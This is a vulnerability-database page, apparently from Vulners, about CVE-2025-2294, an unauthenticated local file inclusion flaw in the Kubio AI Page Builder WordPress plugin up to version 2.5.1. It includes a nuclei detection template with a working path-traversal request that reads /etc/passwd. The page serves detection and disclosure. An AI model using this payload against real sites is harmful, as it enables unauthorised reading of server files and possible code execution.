Lucene search
K

Kubio AI Page Builder <= 2.5.1 - Local File Inclusion

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 128 Views

Kubio AI Page Builder versions up to 2.5.1 allow local file inclusion by unauthenticated attackers.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-2294
13 May 202520:16
githubexploit
GithubExploit
Exploit for CVE-2025-2294
27 Mar 202519:09
githubexploit
GithubExploit
Exploit for CVE-2025-22294
25 Sep 202516:43
githubexploit
GithubExploit
Exploit for CVE-2025-2294
15 Apr 202519:27
githubexploit
GithubExploit
Exploit for CVE-2025-2294
24 May 202508:35
githubexploit
GithubExploit
Exploit for CVE-2025-2294
31 Mar 202511:51
githubexploit
GithubExploit
Exploit for CVE-2025-2294
28 Jul 202502:02
githubexploit
GithubExploit
Exploit for CVE-2025-2294
26 Apr 202516:59
githubexploit
GithubExploit
Exploit for CVE-2025-2294
23 Jan 202612:41
githubexploit
Circl
CVE-2025-2294
28 Mar 202500:00
circl
Rows per page
id: CVE-2025-2294

info:
  name: Kubio AI Page Builder <= 2.5.1 - Local File Inclusion
  author: s4e-io
  severity: critical
  description: |
    The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.5.1 via thekubio_hybrid_theme_load_template function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
  impact: |
    Unauthenticated attackers can include and execute arbitrary files through the kubio_hybrid_theme_load_template function, allowing arbitrary PHP code execution and potential complete server compromise.
  remediation: |
    Fixed in 2.5.2
  reference:
    - https://github.com/Nxploited/CVE-2025-2294
    - https://plugins.trac.wordpress.org/browser/kubio/tags/2.5.1/lib/integrations/third-party-themes/editor-hooks.php#L32
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kubio/kubio-ai-page-builder-251-unauthenticated-local-file-inclusion
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-2294
    cwe-id: CWE-22
    epss-score: 0.76761
    epss-percentile: 0.99489
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="wp-content/plugins/kubio/"
  tags: cve,cve2025,wp,wordpress,wp-plugin,lfi,kubio,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/plugins/kubio")'
        internal: true

  - raw:
      - |
        GET /?__kubio-site-edit-iframe-preview=1&__kubio-site-edit-iframe-classic-template=../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100abe36ccd54a21c3a0e6b8ed7dbc2978f8e0501c6134e4c4fcd54df30af55d0cf022100fea49e213eb06d318da10bd30f54067d119013b51496ba5e4a50533fb46a133e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.9High risk
Vulners AI Score7.9
CVSS 3.19.8
EPSS0.76761
SSVC
128